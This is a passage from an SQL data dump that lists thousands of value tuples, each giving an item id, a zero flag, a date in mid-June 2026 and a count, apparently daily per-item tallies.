20260615',3),(1770,0,'20260615',3),(2063,0,'20260615',3),(2150,0,'20260615',3),(2617,0,'20260615',3),(2751,0,'20260615',3),(3249,0,'20260615',3),(3253,0,'20260615',3),(3257,0,'20260615',3),(3261,0,'20260615',3),(3710,0,'20260615',3),(3724,0,'20260615',3),(3781,0,'20260615',3),(4420,0,'20260615',3),(4542,0,'20260615',3),(4612,0,'20260615',3),(4893,0,'20260615',3),(5157,0,'20260615',3),(5276,0,'20260615',3),(5561,0,'20260615',3),(5601,0,'20260615',3),(76,0,'20260615',4),(108,0,'20260615',4),(470,0,'20260615',4),(472,0,'20260615',4),(1713,0,'20260615',4),(1728,0,'20260615',4),(1766,0,'20260615',4),(1780,0,'20260615',4),(2503,0,'20260615',4),(2609,0,'20260615',4),(4436,0,'20260615',4),(4520,0,'20260615',4),(4930,0,'20260615',4),(5101,0,'20260615',4),(5363,0,'20260615',4),(5910,0,'20260615',4),(84,0,'20260615',5),(87,0,'20260615',5),(468,0,'20260615',5),(2148,0,'20260615',5),(2159,0,'20260615',5),(2309,0,'20260615',5),(5567,0,'20260615',5),(89,0,'20260615',6),(474,0,'20260615',6),(486,0,'20260615',6),(487,0,'20260615',6),(5489,0,'20260615',6),(5878,0,'20260615',6),(5945,0,'20260615',6),(5626,0,'20260615',9),(3247,0,'20260615',10),(5502,0,'20260615',10),(72,0,'20260615',11),(91,0,'20260615',14),(80,0,'20260615',16),(5950,0,'20260615',48),(9,0,'20260615',395),(102,0,'20260616',1),(106,0,'20260616',1),(472,0,'20260616',1),(476,0,'20260616',1),(488,0,'20260616',1),(570,0,'20260616',1),(1600,0,'20260616',1),(1606,0,'20260616',1),(1610,0,'20260616',1),(1695,0,'20260616',1),(1699,0,'20260616',1),(1701,0,'20260616',1),(1705,0,'20260616',1),(1707,0,'20260616',1),(1709,0,'20260616',1),(1711,0,'20260616',1),(1713,0,'20260616',1),(1720,0,'20260616',1),(1726,0,'20260616',1),(1766,0,'20260616',1),(1776,0,'20260616',1),(2159,0,'20260616',1),(2248,0,'20260616',1),(2293,0,'20260616',1),(2296,0,'20260616',1),(2751,0,'20260616',1),(2911,0,'20260616',1),(3006,0,'20260616',1),(3063,0,'20260616',1),(3079,0,'20260616',1),(3083,0,'20260616',1),(3096,0,'20260616',1),(3104,0,'20260616',1),(3251,0,'20260616',1),(3259,0,'20260616',1),(3263,0,'20260616',1),(3280,0,'20260616',1),(3316,0,'20260616',1),(3430,0,'20260616',1),(3482,0,'20260616',1),(3541,0,'20260616',1),(3724,0,'20260616',1),(3731,0,'20260616',1),(3738,0,'20260616',1),(3742,0,'20260616',1),(3764,0,'20260616',1),(4329,0,'20260616',1),(4332,0,'20260616',1),(4387,0,'20260616',1),(4391,0,'20260616',1),(4408,0,'20260616',1),(4412,0,'20260616',1),(4416,0,'20260616',1),(4432,0,'20260616',1),(4440,0,'20260616',1),(4454,0,'20260616',1),(4457,0,'20260616',1),(4524,0,'20260616',1),(4529,0,'20260616',1),(4546,0,'20260616',1),(4551,0,'20260616',1),(4582,0,'20260616',1),(4645,0,'20260616',1),(4651,0,'20260616',1),(4756,0,'20260616',1),(4768,0,'20260616',1),(4792,0,'20260616',1),(4874,0,'20260616',1),(4888,0,'20260616',1),(5024,0,'20260616',1),(5033,0,'20260616',1),(5076,0,'20260616',1),(5122,0,'20260616',1),(5163,0,'20260616',1),(5259,0,'20260616',1),(5268,0,'20260616',1),(5330,0,'20260616',1),(5356,0,'20260616',1),(5374,0,'20260616',1),(5378,0,'20260616',1),(5400,0,'20260616',1),(5449,0,'20260616',1),(5467,0,'20260616',1),(5567,0,'20260616',1),(5578,0,'20260616',1),(5609,0,'20260616',1),(5674,0,'20260616',1),(5785,0,'20260616',1),(5872,0,'20260616',1),(5881,0,'20260616',1),(5884,0,'20260616',1),(5917,0,'20260616',1),(5925,0,'20260616',1),(5961,0,'20260616',1),(5964,0,'20260616',1),(5967,0,'20260616',1),(471,0,'20260616',2),(480,0,'20260616',2),(483,0,'20260616',2),(484,0,'20260616',2),(485,0,'20260616',2),(486,0,'20260616',2),(1582,0,'20260616',2),(1586,0,'20260616',2),(1594,0,'20260616',2),(1608,0,'20260616',2),(1703,0,'20260616',2),(1715,0,'20260616',2),(1718,0,'20260616',2),(1722,0,'20260616',2),(1724,0,'20260616',2),(1728,0,'20260616',2),(1732,0,'20260616',2),(1734,0,'20260616',2),(1745,0,'20260616',2),(1749,0,'20260616',2),(1751,0,'20260616',2),(1768,0,'20260616',2),(1772,0,'20260616',2),(1778,0,'20260616',2),(2252,0,'20260616',2),(2617,0,'20260616',2),(2956,0,'20260616',2),(2964,0,'20260616',2),(2965,0,'20260616',2),(2991,0,'20260616',2),(3030,0,'20260616',2),(3038,0,'20260616',2),(3060,0,'20260616',2),(3072,0,'20260616',2),(3087,0,'20260616',2),(3090,0,'20260616',2),(3102,0,'20260616',2),(3107,0,'20260616',2),(3226,0,'20260616',2),(3249,0,'20260616',2),(3265,0,'20260616',2),(3282,0,'20260616',2),(3285,0,'20260616',2),(3287,0,'20260616',2),(3307,0,'20260616',2),(3438,0,'20260616',2),(3479,0,'20260616',2),(3727,0,'20260616',2),(3749,0,'20260616',2),(4341,0,'20260616',2),(4357,0,'20260616',2),(4368,0,'20260616',2),(4382,0,'20260616',2),(4420,0,'20260616',2),(4448,0,'20260616',2),(4542,0,'20260616',2),(4566,0,'20260616',2),(4587,0,'20260616',2),(4608,0,'20260616',2),(4612,0,'20260616',2),(4648,0,'20260616',2),(4660,0,'20260616',2),(4688,0,'20260616',2),(4703,0,'20260616',2),(4706,0,'20260616',2),(4762,0,'20260616',2),(4765,0,'20260616',2),(4771,0,'20260616',2),(4976,0,'20260616',2),(5028,0,'20260616',2),(5071,0,'20260616',2),(5080,0,'20260616',2),(5101,0,'20260616',2),(5134,0,'20260616',2),(5256,0,'20260616',2),(5271,0,'20260616',2),(5301,0,'20260616',2),(5323,0,'20260616',2),(5326,0,'20260616',2),(5415,0,'20260616',2),(5425,0,'20260616',2),(5461,0,'20260616',2),(5492,0,'20260616',2),(5570,0,'20260616',2),(5662,0,'20260616',2),(5769,0,'20260616',2),(5816,0,'20260616',2),(5828,0,'20260616',2),(5868,0,'20260616',2),(5875,0,'20260616',2),(467,0,'20260616',3),(469,0,'20260616',3),(482,0,'20260616',3),(1544,0,'20260616',3),(1590,0,'20260616',3),(1592,0,'20260616',3),(1596,0,'20260616',3),(1598,0,'20260616',3),(1604,0,'20260616',3),(1743,0,'20260616',3),(1780,0,'20260616',3),(2309,0,'20260616',3),(2457,0,'20260616',3),(2558,0,'20260616',3),(2748,0,'20260616',3),(2775,0,'20260616',3),(2809,0,'20260616',3),(2993,0,'20260616',3),(3041,0,'20260616',3),(3045,0,'20260616',3),(3069,0,'20260616',3),(3109,0,'20260616',3),(3278,0,'20260616',3),(3313,0,'20260616',3),(3714,0,'20260616',3),(4396,0,'20260616',3),(4436,0,'20260616',3),(4520,0,'20260616',3),(4591,0,'20260616',3),(4681,0,'20260616',3),(4697,0,'20260616',3),(4709,0,'20260616',3),(4722,0,'20260616',3),(4741,0,'20260616',3),(4759,0,'20260616',3),(4870,0,'20260616',3),(4883,0,'20260616',3),(4930,0,'20260616',3),(4980,0,'20260616',3),(4988,0,'20260616',3),(4996,0,'20260616',3),(5050,0,'20260616',3),(5054,0,'20260616',3),(5058,0,'20260616',3),(5128,0,'20260616',3),(5131,0,'20260616',3),(5137,0,'20260616',3),(5153,0,'20260616',3),(5276,0,'20260616',3),(5295,0,'20260616',3),(5298,0,'20260616',3),(5420,0,'20260616',3),(5441,0,'20260616',3),(5454,0,'20260616',3),(5512,0,'20260616',3),(5515,0,'20260616',3),(5626,0,'20260616',3),(5636,0,'20260616',3),(5683,0,'20260616',3),(5735,0,'20260616',3),(5762,0,'20260616',3),(5778,0,'20260616',3),(5844,0,'20260616',3),(5921,0,'20260616',3),(473,0,'20260616',4),(1747,0,'20260616',4),(2156,0,'20260616',4),(2769,0,'20260616',4),(2804,0,'20260616',4),(3005,0,'20260616',4),(3097,0,'20260616',4),(3275,0,'20260616',4),(4301,0,'20260616',4),(4404,0,'20260616',4),(4744,0,'20260616',4),(4977,0,'20260616',4),(5037,0,'20260616',4),(5253,0,'20260616',4),(5280,0,'20260616',4),(5307,0,'20260616',4),(5406,0,'20260616',4),(5561,0,'20260616',4),(5582,0,'20260616',4),(5585,0,'20260616',4),(5598,0,'20260616',4),(5738,0,'20260616',4),(5821,0,'20260616',4),(5824,0,'20260616',4),(5902,0,'20260616',4),(87,0,'20260616',5),(108,0,'20260616',5),(2165,0,'20260616',5),(2297,0,'20260616',5),(2813,0,'20260616',5),(2904,0,'20260616',5),(3004,0,'20260616',5),(3023,0,'20260616',5),(3027,0,'20260616',5),(3034,0,'20260616',5),(3127,0,'20260616',5),(3253,0,'20260616',5),(3290,0,'20260616',5),(3297,0,'20260616',5),(4238,0,'20260616',5),(4363,0,'20260616',5),(4677,0,'20260616',5),(4712,0,'20260616',5),(5042,0,'20260616',5),(5046,0,'20260616',5),(5067,0,'20260616',5),(5412,0,'20260616',5),(5428,0,'20260616',5),(5433,0,'20260616',5),(5489,0,'20260616',5),(5502,0,'20260616',5),(5601,0,'20260616',5),(5605,0,'20260616',5),(5696,0,'20260616',5),(5859,0,'20260616',5),(5878,0,'20260616',5),(74,0,'20260616',6),(76,0,'20260616',6),(89,0,'20260616',6),(335,0,'20260616',6),(468,0,'20260616',6),(487,0,'20260616',6),(1602,0,'20260616',6),(1612,0,'20260616',6),(1614,0,'20260616',6),(2503,0,'20260616',6),(2658,0,'20260616',6),(2704,0,'20260616',6),(3710,0,'20260616',6),(4685,0,'20260616',6),(4747,0,'20260616',6),(4878,0,'20260616',6),(5020,0,'20260616',6),(5397,0,'20260616',6),(5436,0,'20260616',6),(5906,0,'20260616',6),(1584,0,'20260616',7),(1588,0,'20260616',7),(2801,0,'20260616',7),(4335,0,'20260616',7),(5409,0,'20260616',7),(5771,0,'20260616',7),(5910,0,'20260616',7),(3781,0,'20260616',8),(5700,0,'20260616',8),(84,0,'20260616',9),(470,0,'20260616',9),(5593,0,'20260616',9),(5930,0,'20260616',9),(91,0,'20260616',10),(474,0,'20260616',10),(5847,0,'20260616',10),(5945,0,'20260616',11),(80,0,'20260616',13),(72,0,'20260616',18),(5950,0,'20260616',25),(9,0,'20260616',655),(74,0,'20260617',1),(102,0,'20260617',1),(108,0,'20260617',1),(471,0,'20260617',1),(477,0,'20260617',1),(482,0,'20260617',1),(484,0,'20260617',1),(485,0,'20260617',1),(570,0,'20260617',1),(1544,0,'20260617',1),(1588,0,'20260617',1),(1604,0,'20260617',1),(1606,0,'20260617',1),(1608,0,'20260617',1),(1612,0,'20260617',1),(1614,0,'20260617',1),(1697,0,'20260617',1),(1699,0,'20260617',1),(1701,0,'20260617',1),(1703,0,'20260617',1),(1707,0,'20260617',1),(1709,0,'20260617',1),(1711,0,'20260617',1),(1713,0,'20260617',1),(1722,0,'20260617',1),(1724,0,'20260617',1),(1747,0,'20260617',1),(1768,0,'20260617',1),(1772,0,'20260617',1),(1774,0,'20260617',1),(1782,0,'20260617',1),(2152,0,'20260617',1),(2165,0,'20260617',1),(2309,0,'20260617',1),(2457,0,'20260617',1),(2558,0,'20260617',1),(2704,0,'20260617',1),(2775,0,'20260617',1),(2956,0,'20260617',1),(2965,0,'20260617',1),(3005,0,'20260617',1),(3023,0,'20260617',1),(3030,0,'20260617',1),(3079,0,'20260617',1),(3087,0,'20260617',1),(3092,0,'20260617',1),(3097,0,'20260617',1),(3107,0,'20260617',1),(3247,0,'20260617',1),(3265,0,'20260617',1),(3278,0,'20260617',1),(3290,0,'20260617',1),(3430,0,'20260617',1),(3531,0,'20260617',1),(3724,0,'20260617',1),(3735,0,'20260617',1),(3777,0,'20260617',1),(4275,0,'20260617',1),(4301,0,'20260617',1),(4329,0,'20260617',1),(4391,0,'20260617',1),(4404,0,'20260617',1),(4412,0,'20260617',1),(4416,0,'20260617',1),(4432,0,'20260617',1),(4436,0,'20260617',1),(4454,0,'20260617',1),(4457,0,'20260617',1),(4546,0,'20260617',1),(4556,0,'20260617',1),(4608,0,'20260617',1),(4612,0,'20260617',1),(4648,0,'20260617',1),(4651,0,'20260617',1),(4657,0,'20260617',1),(4674,0,'20260617',1),(4685,0,'20260617',1),(4712,0,'20260617',1),(4744,0,'20260617',1),(4747,0,'20260617',1),(4762,0,'20260617',1),(4797,0,'20260617',1),(4893,0,'20260617',1),(4930,0,'20260617',1),(4976,0,'20260617',1),(4988,0,'20260617',1),(4996,0,'20260617',1),(5020,0,'20260617',1),(5024,0,'20260617',1),(5033,0,'20260617',1),(5037,0,'20260617',1),(5042,0,'20260617',1),(5058,0,'20260617',1),(5080,0,'20260617',1),(5101,0,'20260617',1),(5153,0,'20260617',1),(5163,0,'20260617',1),(5248,0,'20260617',1),(5276,0,'20260617',1),(5292,0,'20260617',1),(5295,0,'20260617',1),(5301,0,'20260617',1),(5307,0,'20260617',1),(5353,0,'20260617',1),(5359,0,'20260617',1),(5363,0,'20260617',1),(5374,0,'20260617',1),(5409,0,'20260617',1),(5428,0,'20260617',1),(5464,0,'20260617',1),(5467,0,'20260617',1),(5492,0,'20260617',1),(5515,0,'20260617',1),(5561,0,'20260617',1),(5570,0,'20260617',1),(5605,0,'20260617',1),(5662,0,'20260617',1),(5700,0,'20260617',1),(5735,0,'20260617',1),(5762,0,'20260617',1),(5785,0,'20260617',1),(5821,0,'20260617',1),(5828,0,'20260617',1),(5865,0,'20260617',1),(5921,0,'20260617',1),(5975,0,'20260617',1),(106,0,'20260617',2),(468,0,'20260617',2),(472,0,'20260617',2),(478,0,'20260617',2),(481,0,'20260617',2),(488,0,'20260617',2),(1586,0,'20260617',2),(1598,0,'20260617',2),(1610,0,'20260617',2),(1695,0,'20260617',2),(1732,0,'20260617',2),(1734,0,'20260617',2),(1739,0,'20260617',2),(1741,0,'20260617',2),(1745,0,'20260617',2),(1749,0,'20260617',2),(1776,0,'20260617',2),(2156,0,'20260617',2),(2159,0,'20260617',2),(2503,0,'20260617',2),(2751,0,'20260617',2),(2801,0,'20260617',2),(2911,0,'20260617',2),(2964,0,'20260617',2),(2991,0,'20260617',2),(3006,0,'20260617',2),(3045,0,'20260617',2),(3069,0,'20260617',2),(3072,0,'20260617',2),(3102,0,'20260617',2),(3109,0,'20260617',2),(3117,0,'20260617',2),(3259,0,'20260617',2),(3267,0,'20260617',2),(3271,0,'20260617',2),(3273,0,'20260617',2),(3275,0,'20260617',2),(3280,0,'20260617',2),(3282,0,'20260617',2),(3285,0,'20260617',2),(3287,0,'20260617',2),(3307,0,'20260617',2),(3438,0,'20260617',2),(3479,0,'20260617',2),(3486,0,'20260617',2),(3534,0,'20260617',2),(3541,0,'20260617',2),(3721,0,'20260617',2),(3731,0,'20260617',2),(3749,0,'20260617',2),(3781,0,'20260617',2),(4238,0,'20260617',2),(4326,0,'20260617',2),(4363,0,'20260617',2),(4368,0,'20260617',2),(4382,0,'20260617',2),(4444,0,'20260617',2),(4448,0,'20260617',2),(4524,0,'20260617',2),(4529,0,'20260617',2),(4542,0,'20260617',2),(4551,0,'20260617',2),(4582,0,'20260617',2),(4591,0,'20260617',2),(4677,0,'20260617',2),(4681,0,'20260617',2),(4688,0,'20260617',2),(4694,0,'20260617',2),(4697,0,'20260617',2),(4706,0,'20260617',2),(4768,0,'20260617',2),(4776,0,'20260617',2),(4802,0,'20260617',2),(4858,0,'20260617',2),(4862,0,'20260617',2),(4870,0,'20260617',2),(4874,0,'20260617',2),(4878,0,'20260617',2),(4980,0,'20260617',2),(5028,0,'20260617',2),(5122,0,'20260617',2),(5131,0,'20260617',2),(5134,0,'20260617',2),(5137,0,'20260617',2),(5268,0,'20260617',2),(5310,0,'20260617',2),(5320,0,'20260617',2),(5356,0,'20260617',2),(5397,0,'20260617',2),(5400,0,'20260617',2),(5449,0,'20260617',2),(5489,0,'20260617',2),(5502,0,'20260617',2),(5567,0,'20260617',2),(5598,0,'20260617',2),(5609,0,'20260617',2),(5626,0,'20260617',2),(5666,0,'20260617',2),(5674,0,'20260617',2),(5771,0,'20260617',2),(5833,0,'20260617',2),(5844,0,'20260617',2),(5875,0,'20260617',2),(5884,0,'20260617',2),(5889,0,'20260617',2),(5917,0,'20260617',2),(5925,0,'20260617',2),(87,0,'20260617',3),(479,0,'20260617',3),(483,0,'20260617',3),(487,0,'20260617',3),(1582,0,'20260617',3),(1584,0,'20260617',3),(1596,0,'20260617',3),(1705,0,'20260617',3),(1715,0,'20260617',3),(1766,0,'20260617',3),(1770,0,'20260617',3),(1780,0,'20260617',3),(2150,0,'20260617',3),(2248,0,'20260617',3),(2252,0,'20260617',3),(2297,0,'20260617',3),(2993,0,'20260617',3),(3038,0,'20260617',3),(3066,0,'20260617',3),(3083,0,'20260617',3),(3090,0,'20260617',3),(3096,0,'20260617',3),(3226,0,'20260617',3),(3263,0,'20260617',3),(3297,0,'20260617',3),(3498,0,'20260617',3),(3710,0,'20260617',3),(3764,0,'20260617',3),(4373,0,'20260617',3),(4408,0,'20260617',3),(4420,0,'20260617',3),(4654,0,'20260617',3),(4700,0,'20260617',3),(4792,0,'20260617',3),(4866,0,'20260617',3),(4883,0,'20260617',3),(5062,0,'20260617',3),(5067,0,'20260617',3),(5071,0,'20260617',3),(5146,0,'20260617',3),(5304,0,'20260617',3),(5412,0,'20260617',3),(5415,0,'20260617',3),(5420,0,'20260617',3),(5461,0,'20260617',3),(5769,0,'20260617',3),(5778,0,'20260617',3),(5816,0,'20260617',3),(5881,0,'20260617',3),(5930,0,'20260617',3),(76,0,'20260617',4),(80,0,'20260617',4),(335,0,'20260617',4),(467,0,'20260617',4),(473,0,'20260617',4),(480,0,'20260617',4),(1594,0,'20260617',4),(1728,0,'20260617',4),(1730,0,'20260617',4),(1778,0,'20260617',4),(2063,0,'20260617',4),(2617,0,'20260617',4),(2904,0,'20260617',4),(3063,0,'20260617',4),(3746,0,'20260617',4),(5054,0,'20260617',4),(5128,0,'20260617',4),(5264,0,'20260617',4),(5323,0,'20260617',4),(5334,0,'20260617',4),(5378,0,'20260617',4),(5436,0,'20260617',4),(5454,0,'20260617',4),(5457,0,'20260617',4),(5868,0,'20260617',4),(5902,0,'20260617',4),(5910,0,'20260617',4),(89,0,'20260617',5),(474,0,'20260617',5),(476,0,'20260617',5),(2769,0,'20260617',5),(5259,0,'20260617',5),(5738,0,'20260617',5),(5847,0,'20260617',5),(5872,0,'20260617',5),(5878,0,'20260617',5),(5906,0,'20260617',5),(5945,0,'20260617',5),(84,0,'20260617',6),(1718,0,'20260617',6),(5593,0,'20260617',6),(5824,0,'20260617',6),(2658,0,'20260617',7),(2813,0,'20260617',7),(5076,0,'20260617',8),(5859,0,'20260617',8),(1602,0,'20260617',9),(5406,0,'20260617',9),(470,0,'20260617',10),(5961,0,'20260617',10),(5964,0,'20260617',11),(91,0,'20260617',13),(5967,0,'20260617',15),(72,0,'20260617',21),(9,0,'20260617',603),(472,0,'20260618',1),(476,0,'20260618',1),(481,0,'20260618',1),(1584,0,'20260618',1),(1604,0,'20260618',1),(1697,0,'20260618',1),(1711,0,'20260618',1),(1713,0,'20260618',1),(1724,0,'20260618',1),(1734,0,'20260618',1),(1749,0,'20260618',1),(1751,0,'20260618',1),(1766,0,'20260618',1),(1780,0,'20260618',1),(1782,0,'20260618',1),(2148,0,'20260618',1),(2152,0,'20260618',1),(2293,0,'20260618',1),(2457,0,'20260618',1),(2658,0,'20260618',1),(2704,0,'20260618',1),(2801,0,'20260618',1),(2804,0,'20260618',1),(2911,0,'20260618',1),(2964,0,'20260618',1),(2965,0,'20260618',1),(3004,0,'20260618',1),(3005,0,'20260618',1),(3006,0,'20260618',1),(3034,0,'20260618',1),(3066,0,'20260618',1),(3069,0,'20260618',1),(3087,0,'20260618',1),(3104,0,'20260618',1),(3109,0,'20260618',1),(3229,0,'20260618',1),(3249,0,'20260618',1),(3257,0,'20260618',1),(3267,0,'20260618',1),(3273,0,'20260618',1),(3280,0,'20260618',1),(3282,0,'20260618',1),(3297,0,'20260618',1),(3313,0,'20260618',1),(3482,0,'20260618',1),(3498,0,'20260618',1),(3724,0,'20260618',1),(3735,0,'20260618',1),(3738,0,'20260618',1),(3742,0,'20260618',1),(3752,0,'20260618',1),(3774,0,'20260618',1),(4301,0,'20260618',1),(4332,0,'20260618',1),(4338,0,'20260618',1),(4341,0,'20260618',1),(4396,0,'20260618',1),(4428,0,'20260618',1),(4440,0,'20260618',1),(4448,0,'20260618',1),(4454,0,'20260618',1),(4514,0,'20260618',1),(4566,0,'20260618',1),(4587,0,'20260618',1),(4648,0,'20260618',1),(4651,0,'20260618',1),(4663,0,'20260618',1),(4668,0,'20260618',1),(4674,0,'20260618',1),(4681,0,'20260618',1),(4685,0,'20260618',1),(4694,0,'20260618',1),(4709,0,'20260618',1),(4744,0,'20260618',1),(4753,0,'20260618',1),(4756,0,'20260618',1),(4762,0,'20260618',1),(4768,0,'20260618',1),(4792,0,'20260618',1),(4862,0,'20260618',1),(4870,0,'20260618',1),(4878,0,'20260618',1),(4883,0,'20260618',1),(4893,0,'20260618',1),(4897,0,'20260618',1),(5033,0,'20260618',1),(5037,0,'20260618',1),(5050,0,'20260618',1),(5067,0,'20260618',1),(5080,0,'20260618',1),(5101,0,'20260618',1),(5122,0,'20260618',1),(5137,0,'20260618',1),(5163,0,'20260618',1),(5292,0,'20260618',1),(5298,0,'20260618',1),(5304,0,'20260618',1),(5314,0,'20260618',1),(5317,0,'20260618',1),(5378,0,'20260618',1),(5425,0,'20260618',1),(5428,0,'20260618',1),(5457,0,'20260618',1),(5461,0,'20260618',1),(5515,0,'20260618',1),(5570,0,'20260618',1),(5601,0,'20260618',1),(5735,0,'20260618',1),(5821,0,'20260618',1),(5875,0,'20260618',1),(5910,0,'20260618',1),(76,0,'20260618',2),(108,0,'20260618',2),(482,0,'20260618',2),(484,0,'20260618',2),(485,0,'20260618',2),(1544,0,'20260618',2),(1592,0,'20260618',2),(1598,0,'20260618',2),(1612,0,'20260618',2),(1695,0,'20260618',2),(1699,0,'20260618',2),(1701,0,'20260618',2),(1703,0,'20260618',2),(1709,0,'20260618',2),(1720,0,'20260618',2),(1722,0,'20260618',2),(1730,0,'20260618',2),(1732,0,'20260618',2),(1743,0,'20260618',2),(1747,0,'20260618',2),(1768,0,'20260618',2),(1772,0,'20260618',2),(1774,0,'20260618',2),(2063,0,'20260618',2),(2248,0,'20260618',2),(2296,0,'20260618',2),(2297,0,'20260618',2),(2309,0,'20260618',2),(2558,0,'20260618',2),(2609,0,'20260618',2),(2617,0,'20260618',2),(2769,0,'20260618',2),(3038,0,'20260618',2),(3063,0,'20260618',2),(3090,0,'20260618',2),(3096,0,'20260618',2),(3097,0,'20260618',2),(3245,0,'20260618',2),(3265,0,'20260618',2),(3269,0,'20260618',2),(3271,0,'20260618',2),(3278,0,'20260618',2),(3430,0,'20260618',2),(3486,0,'20260618',2),(3531,0,'20260618',2),(3731,0,'20260618',2),(4238,0,'20260618',2),(4326,0,'20260618',2),(4377,0,'20260618',2),(4391,0,'20260618',2),(4404,0,'20260618',2),(4408,0,'20260618',2),(4412,0,'20260618',2),(4582,0,'20260618',2),(4654,0,'20260618',2),(4700,0,'20260618',2),(4722,0,'20260618',2),(4741,0,'20260618',2),(4747,0,'20260618',2),(4866,0,'20260618',2),(4888,0,'20260618',2),(4977,0,'20260618',2),(5046,0,'20260618',2),(5146,0,'20260618',2),(5157,0,'20260618',2),(5248,0,'20260618',2),(5295,0,'20260618',2),(5301,0,'20260618',2),(5310,0,'20260618',2),(5320,0,'20260618',2),(5326,0,'20260618',2),(5334,0,'20260618',2),(5406,0,'20260618',2),(5433,0,'20260618',2),(5449,0,'20260618',2),(5472,0,'20260618',2),(5567,0,'20260618',2),(5598,0,'20260618',2),(5609,0,'20260618',2),(5785,0,'20260618',2),(5816,0,'20260618',2),(5833,0,'20260618',2),(5844,0,'20260618',2),(5884,0,'20260618',2),(5917,0,'20260618',2),(5925,0,'20260618',2),(5930,0,'20260618',2),(87,0,'20260618',3),(467,0,'20260618',3),(470,0,'20260618',3),(473,0,'20260618',3),(488,0,'20260618',3),(1586,0,'20260618',3),(1590,0,'20260618',3),(1596,0,'20260618',3),(1600,0,'20260618',3),(1602,0,'20260618',3),(1608,0,'20260618',3),(1614,0,'20260618',3),(1707,0,'20260618',3),(1718,0,'20260618',3),(1739,0,'20260618',3),(1741,0,'20260618',3),(1776,0,'20260618',3),(1778,0,'20260618',3),(2156,0,'20260618',3),(2161,0,'20260618',3),(2751,0,'20260618',3),(2991,0,'20260618',3),(2993,0,'20260618',3),(3092,0,'20260618',3),(3251,0,'20260618',3),(3275,0,'20260618',3),(3727,0,'20260618',3),(4275,0,'20260618',3),(4416,0,'20260618',3),(4420,0,'20260618',3),(4424,0,'20260618',3),(4432,0,'20260618',3),(4444,0,'20260618',3),(4608,0,'20260618',3),(4874,0,'20260618',3),(4930,0,'20260618',3),(4980,0,'20260618',3),(4983,0,'20260618',3),(5062,0,'20260618',3),(5071,0,'20260618',3),(5076,0,'20260618',3),(5131,0,'20260618',3),(5253,0,'20260618',3),(5256,0,'20260618',3),(5268,0,'20260618',3),(5330,0,'20260618',3),(5353,0,'20260618',3),(5359,0,'20260618',3),(5363,0,'20260618',3),(5383,0,'20260618',3),(5492,0,'20260618',3),(5512,0,'20260618',3),(5593,0,'20260618',3),(5674,0,'20260618',3),(5696,0,'20260618',3),(5738,0,'20260618',3),(5762,0,'20260618',3),(5878,0,'20260618',3),(5889,0,'20260618',3),(5902,0,'20260618',3),(5906,0,'20260618',3),(5921,0,'20260618',3),(89,0,'20260618',4),(102,0,'20260618',4),(487,0,'20260618',4),(1582,0,'20260618',4),(1588,0,'20260618',4),(1770,0,'20260618',4),(2159,0,'20260618',4),(2503,0,'20260618',4),(2813,0,'20260618',4),(2989,0,'20260618',4),(3083,0,'20260618',4),(3102,0,'20260618',4),(3226,0,'20260618',4),(3777,0,'20260618',4),(4436,0,'20260618',4),(4520,0,'20260618',4),(4556,0,'20260618',4),(4802,0,'20260618',4),(5058,0,'20260618',4),(5153,0,'20260618',4),(5307,0,'20260618',4),(5356,0,'20260618',4),(5400,0,'20260618',4),(5454,0,'20260618',4),(5502,0,'20260618',4),(5700,0,'20260618',4),(5771,0,'20260618',4),(5824,0,'20260618',4),(5828,0,'20260618',4),(5847,0,'20260618',4),(5881,0,'20260618',4),(84,0,'20260618',5),(468,0,'20260618',5),(474,0,'20260618',5),(1715,0,'20260618',5),(1728,0,'20260618',5),(4363,0,'20260618',5),(5140,0,'20260618',5),(5259,0,'20260618',5),(5397,0,'20260618',5),(5409,0,'20260618',5),(5467,0,'20260618',5),(5778,0,'20260618',5),(5865,0,'20260618',5),(5945,0,'20260618',5),(5961,0,'20260618',5),(5986,0,'20260618',5),(3124,0,'20260618',6),(4612,0,'20260618',6),(5769,0,'20260618',6),(5872,0,'20260618',6),(5964,0,'20260618',6),(5967,0,'20260618',6),(74,0,'20260618',7),(5489,0,'20260618',7),(570,0,'20260618',8),(3060,0,'20260618',8),(3781,0,'20260618',8),(5859,0,'20260618',8),(2904,0,'20260618',10),(91,0,'20260618',13),(72,0,'20260618',14),(80,0,'20260618',15),(335,0,'20260618',15),(5975,0,'20260618',15),(9,0,'20260618',594),(102,0,'20260619',1),(471,0,'20260619',1),(476,0,'20260619',1),(478,0,'20260619',1),(482,0,'20260619',1),(488,0,'20260619',1),(1592,0,'20260619',1),(1598,0,'20260619',1),(1604,0,'20260619',1),(1608,0,'20260619',1),(1695,0,'20260619',1),(1699,0,'20260619',1),(1701,0,'20260619',1),(1711,0,'20260619',1),(1718,0,'20260619',1),(1737,0,'20260619',1),(1749,0,'20260619',1),(1751,0,'20260619',1),(1770,0,'20260619',1),(1782,0,'20260619',1),(2063,0,'20260619',1),(2148,0,'20260619',1),(2154,0,'20260619',1),(2156,0,'20260619',1),(2178,0,'20260619',1),(2309,0,'20260619',1),(2658,0,'20260619',1),(2748,0,'20260619',1),(2751,0,'20260619',1),(2801,0,'20260619',1),(2809,0,'20260619',1),(2911,0,'20260619',1),(2965,0,'20260619',1),(3006,0,'20260619',1),(3023,0,'20260619',1),(3060,0,'20260619',1),(3079,0,'20260619',1),(3104,0,'20260619',1),(3109,0,'20260619',1),(3117,0,'20260619',1),(3127,0,'20260619',1),(3226,0,'20260619',1),(3243,0,'20260619',1),(3257,0,'20260619',1),(3269,0,'20260619',1),(3278,0,'20260619',1),(3282,0,'20260619',1),(3287,0,'20260619',1),(3297,0,'20260619',1),(3307,0,'20260619',1),(3438,0,'20260619',1),(3724,0,'20260619',1),(3742,0,'20260619',1),(3771,0,'20260619',1),(3777,0,'20260619',1),(4238,0,'20260619',1),(4301,0,'20260619',1),(4323,0,'20260619',1),(4329,0,'20260619',1),(4335,0,'20260619',1),(4341,0,'20260619',1),(4368,0,'20260619',1),(4387,0,'20260619',1),(4391,0,'20260619',1),(4400,0,'20260619',1),(4404,0,'20260619',1),(4408,0,'20260619',1),(4416,0,'20260619',1),(4424,0,'20260619',1),(4440,0,'20260619',1),(4444,0,'20260619',1),(4448,0,'20260619',1),(4520,0,'20260619',1),(4546,0,'20260619',1),(4556,0,'20260619',1),(4587,0,'20260619',1),(4608,0,'20260619',1),(4612,0,'20260619',1),(4645,0,'20260619',1),(4648,0,'20260619',1),(4674,0,'20260619',1),(4681,0,'20260619',1),(4685,0,'20260619',1),(4697,0,'20260619',1),(4759,0,'20260619',1),(4762,0,'20260619',1),(4765,0,'20260619',1),(4768,0,'20260619',1),(4771,0,'20260619',1),(4792,0,'20260619',1),(4862,0,'20260619',1),(4866,0,'20260619',1),(4874,0,'20260619',1